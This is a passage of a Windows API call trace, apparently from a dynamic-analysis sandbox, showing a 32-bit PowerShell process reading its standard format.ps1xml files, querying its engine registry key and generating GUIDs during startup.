ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0043.976] GetLastError () returned 0xcb [0043.976] SetErrorMode (uMode=0x1) returned 0x1 [0043.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25e098, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0043.976] GetLastError () returned 0xcb [0043.976] SetErrorMode (uMode=0x1) returned 0x1 [0043.976] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25e518 | out: lpFileInformation=0x25e518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0043.977] GetLastError () returned 0xcb [0043.977] SetErrorMode (uMode=0x1) returned 0x1 [0043.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25e098, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0043.977] GetLastError () returned 0xcb [0043.977] SetErrorMode (uMode=0x1) returned 0x1 [0043.977] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25e518 | out: lpFileInformation=0x25e518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0043.977] GetLastError () returned 0xcb [0043.977] SetErrorMode (uMode=0x1) returned 0x1 [0043.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25e098, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0043.977] GetLastError () returned 0xcb [0043.977] SetErrorMode (uMode=0x1) returned 0x1 [0043.977] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25e518 | out: lpFileInformation=0x25e518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0043.977] GetLastError () returned 0xcb [0043.977] SetErrorMode (uMode=0x1) returned 0x1 [0043.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25e098, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0043.977] GetLastError () returned 0xcb [0043.977] SetErrorMode (uMode=0x1) returned 0x1 [0043.977] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25e518 | out: lpFileInformation=0x25e518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a182698, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a182698, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd368cf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0043.978] GetLastError () returned 0xcb [0043.978] SetErrorMode (uMode=0x1) returned 0x1 [0043.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25e098, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0043.978] GetLastError () returned 0xcb [0043.978] SetErrorMode (uMode=0x1) returned 0x1 [0043.978] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25e518 | out: lpFileInformation=0x25e518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0043.978] GetLastError () returned 0xcb [0043.978] SetErrorMode (uMode=0x1) returned 0x1 [0043.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25e098, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0043.978] GetLastError () returned 0xcb [0043.978] SetErrorMode (uMode=0x1) returned 0x1 [0043.978] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25e518 | out: lpFileInformation=0x25e518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0043.978] GetLastError () returned 0xcb [0043.978] SetErrorMode (uMode=0x1) returned 0x1 [0043.979] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0043.979] GetLastError () returned 0xcb [0043.981] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0043.981] GetLastError () returned 0xcb [0043.982] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0043.982] GetLastError () returned 0xcb [0043.982] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0043.982] GetLastError () returned 0xcb [0043.983] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0043.983] GetLastError () returned 0xcb [0043.983] SetErrorMode (uMode=0x1) returned 0x1 [0043.983] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314 [0043.983] GetLastError () returned 0x0 [0043.983] GetFileType (hFile=0x314) returned 0x1 [0043.983] SetErrorMode (uMode=0x1) returned 0x1 [0043.983] GetFileType (hFile=0x314) returned 0x1 [0043.983] ReadFile (in: hFile=0x314, lpBuffer=0x2f5e504, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x2f5e504*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.288] GetLastError () returned 0x0 [0044.294] ReadFile (in: hFile=0x314, lpBuffer=0x2f5e504, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x2f5e504*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.294] GetLastError () returned 0x0 [0044.295] ReadFile (in: hFile=0x314, lpBuffer=0x2f5e504, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x2f5e504*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.295] GetLastError () returned 0x0 [0044.296] ReadFile (in: hFile=0x314, lpBuffer=0x2f5e504, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x2f5e504*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.296] GetLastError () returned 0x0 [0044.297] ReadFile (in: hFile=0x314, lpBuffer=0x2f5e504, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x2f5e504*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.297] GetLastError () returned 0x0 [0044.298] ReadFile (in: hFile=0x314, lpBuffer=0x2f5e504, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x2f5e504*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.298] GetLastError () returned 0x0 [0044.298] ReadFile (in: hFile=0x314, lpBuffer=0x2f5e504, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x2f5e504*, lpNumberOfBytesRead=0x25e394*=0x9e2, lpOverlapped=0x0) returned 1 [0044.298] GetLastError () returned 0x0 [0044.298] ReadFile (in: hFile=0x314, lpBuffer=0x2f5da86, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x2f5da86*, lpNumberOfBytesRead=0x25e394*=0x0, lpOverlapped=0x0) returned 1 [0044.298] GetLastError () returned 0x0 [0044.299] ReadFile (in: hFile=0x314, lpBuffer=0x2f5e504, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x2f5e504*, lpNumberOfBytesRead=0x25e394*=0x0, lpOverlapped=0x0) returned 1 [0044.299] GetLastError () returned 0x0 [0044.299] CloseHandle (hObject=0x314) returned 1 [0044.299] GetLastError () returned 0x0 [0044.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x25def4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0044.299] GetLastError () returned 0x0 [0044.300] SetErrorMode (uMode=0x1) returned 0x1 [0044.300] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2f6f5c0 | out: lpFileInformation=0x2f6f5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0044.300] GetLastError () returned 0x0 [0044.300] SetErrorMode (uMode=0x1) returned 0x1 [0044.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x25dec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0044.300] GetLastError () returned 0x0 [0044.301] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e318 | out: phkResult=0x25e318*=0x314) returned 0x0 [0044.301] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e360, lpData=0x0, lpcbData=0x25e35c*=0x0 | out: lpType=0x25e360*=0x1, lpData=0x0, lpcbData=0x25e35c*=0x56) returned 0x0 [0044.302] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e360, lpData=0x54e2a0, lpcbData=0x25e35c*=0x56 | out: lpType=0x25e360*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x25e35c*=0x56) returned 0x0 [0044.302] RegCloseKey (hKey=0x314) returned 0x0 [0044.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x25dec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0044.302] GetLastError () returned 0x0 [0044.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0044.303] GetLastError () returned 0x0 [0044.431] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x698883d, Data2=0xc777, Data3=0x4f1f, Data4=([0]=0x85, [1]=0xfc, [2]=0xe6, [3]=0xe, [4]=0xea, [5]=0x85, [6]=0xdc, [7]=0xe3))) returned 0x0 [0044.438] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x1d6926b3, Data2=0x9734, Data3=0x4887, Data4=([0]=0xac, [1]=0xf9, [2]=0x7e, [3]=0x95, [4]=0x2f, [5]=0x68, [6]=0x11, [7]=0xce))) returned 0x0 [0044.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0044.438] GetLastError () returned 0x0 [0044.438] SetErrorMode (uMode=0x1) returned 0x1 [0044.438] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314 [0044.438] GetLastError () returned 0x0 [0044.438] GetFileType (hFile=0x314) returned 0x1 [0044.438] SetErrorMode (uMode=0x1) returned 0x1 [0044.438] GetFileType (hFile=0x314) returned 0x1 [0044.439] ReadFile (in: hFile=0x314, lpBuffer=0x2f828a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x2f828a8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.440] GetLastError () returned 0x0 [0044.440] ReadFile (in: hFile=0x314, lpBuffer=0x2f828a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x2f828a8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.440] GetLastError () returned 0x0 [0044.440] ReadFile (in: hFile=0x314, lpBuffer=0x2f828a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x2f828a8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.440] GetLastError () returned 0x0 [0044.441] ReadFile (in: hFile=0x314, lpBuffer=0x2f828a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x2f828a8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.441] GetLastError () returned 0x0 [0044.441] ReadFile (in: hFile=0x314, lpBuffer=0x2f828a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x2f828a8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.441] GetLastError () returned 0x0 [0044.441] ReadFile (in: hFile=0x314, lpBuffer=0x2f828a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x2f828a8*, lpNumberOfBytesRead=0x25e394*=0xfb2, lpOverlapped=0x0) returned 1 [0044.441] GetLastError () returned 0x0 [0044.441] ReadFile (in: hFile=0x314, lpBuffer=0x2f81ffa, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x2f81ffa*, lpNumberOfBytesRead=0x25e394*=0x0, lpOverlapped=0x0) returned 1 [0044.442] GetLastError () returned 0x0 [0044.442] ReadFile (in: hFile=0x314, lpBuffer=0x2f828a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x2f828a8*, lpNumberOfBytesRead=0x25e394*=0x0, lpOverlapped=0x0) returned 1 [0044.442] GetLastError () returned 0x0 [0044.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25def4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0044.442] GetLastError () returned 0x0 [0044.442] SetErrorMode (uMode=0x1) returned 0x1 [0044.442] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2fa3138 | out: lpFileInformation=0x2fa3138*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0044.442] GetLastError () returned 0x0 [0044.442] SetErrorMode (uMode=0x1) returned 0x1 [0044.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25dec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0044.442] GetLastError () returned 0x0 [0044.442] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e318 | out: phkResult=0x25e318*=0x314) returned 0x0 [0044.442] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e360, lpData=0x0, lpcbData=0x25e35c*=0x0 | out: lpType=0x25e360*=0x1, lpData=0x0, lpcbData=0x25e35c*=0x56) returned 0x0 [0044.442] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e360, lpData=0x54e2a0, lpcbData=0x25e35c*=0x56 | out: lpType=0x25e360*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x25e35c*=0x56) returned 0x0 [0044.442] RegCloseKey (hKey=0x314) returned 0x0 [0044.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25dec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0044.442] GetLastError () returned 0x0 [0044.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0044.442] GetLastError () returned 0x0 [0044.443] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xc7f035d7, Data2=0x1c5, Data3=0x4fbe, Data4=([0]=0x82, [1]=0xc4, [2]=0xe, [3]=0x37, [4]=0x1d, [5]=0xe5, [6]=0xc6, [7]=0x72))) returned 0x0 [0044.444] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x995b3bcc, Data2=0x49a9, Data3=0x4c57, Data4=([0]=0x9f, [1]=0x13, [2]=0x8b, [3]=0x44, [4]=0x1f, [5]=0x6, [6]=0xfc, [7]=0x3))) returned 0x0 [0044.468] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x416d40ca, Data2=0x3f6, Data3=0x4d12, Data4=([0]=0x98, [1]=0x9e, [2]=0x59, [3]=0xd1, [4]=0xfb, [5]=0x7f, [6]=0x2d, [7]=0x32))) returned 0x0 [0044.468] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x4acb3dc8, Data2=0x4d1e, Data3=0x49b3, Data4=([0]=0x87, [1]=0x8c, [2]=0xd6, [3]=0x27, [4]=0x78, [5]=0x28, [6]=0xed, [7]=0x7a))) returned 0x0 [0044.468] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xa5fc4697, Data2=0x2bf3, Data3=0x4253, Data4=([0]=0x8a, [1]=0x32, [2]=0x17, [3]=0x4d, [4]=0x23, [5]=0x27, [6]=0xb5, [7]=0xed))) returned 0x0 [0044.468] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x4230bcc2, Data2=0x406f, Data3=0x4b52, Data4=([0]=0xad, [1]=0x40, [2]=0x19, [3]=0x60, [4]=0x19, [5]=0x3, [6]=0xb8, [7]=0xf0))) returned 0x0 [0044.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0044.468] GetLastError () returned 0x0 [0044.468] SetErrorMode (uMode=0x1) returned 0x1 [0044.468] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314 [0044.468] GetLastError () returned 0x0 [0044.468] GetFileType (hFile=0x314) returned 0x1 [0044.468] SetErrorMode (uMode=0x1) returned 0x1 [0044.468] GetFileType (hFile=0x314) returned 0x1 [0044.469] ReadFile (in: hFile=0x314, lpBuffer=0x2fc2ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x2fc2ae0*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.479] GetLastError () returned 0x0 [0044.480] ReadFile (in: hFile=0x314, lpBuffer=0x2fc2ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x2fc2ae0*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.480] GetLastError () returned 0x0 [0044.480] ReadFile (in: hFile=0x314, lpBuffer=0x2fc2ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x2fc2ae0*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.480] GetLastError () returned 0x0 [0044.480] ReadFile (in: hFile=0x314, lpBuffer=0x2fc2ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x2fc2ae0*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.480] GetLastError () returned 0x0 [0044.481] ReadFile (in: hFile=0x314, lpBuffer=0x2fc2ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x2fc2ae0*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.481] GetLastError () returned 0x0 [0044.481] ReadFile (in: hFile=0x314, lpBuffer=0x2fc2ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x2fc2ae0*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.481] GetLastError () returned 0x0 [0044.481] ReadFile (in: hFile=0x314, lpBuffer=0x2fc2ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x2fc2ae0*, lpNumberOfBytesRead=0x25e394*=0xaca, lpOverlapped=0x0) returned 1 [0044.481] GetLastError () returned 0x0 [0044.481] ReadFile (in: hFile=0x314, lpBuffer=0x2fc214a, 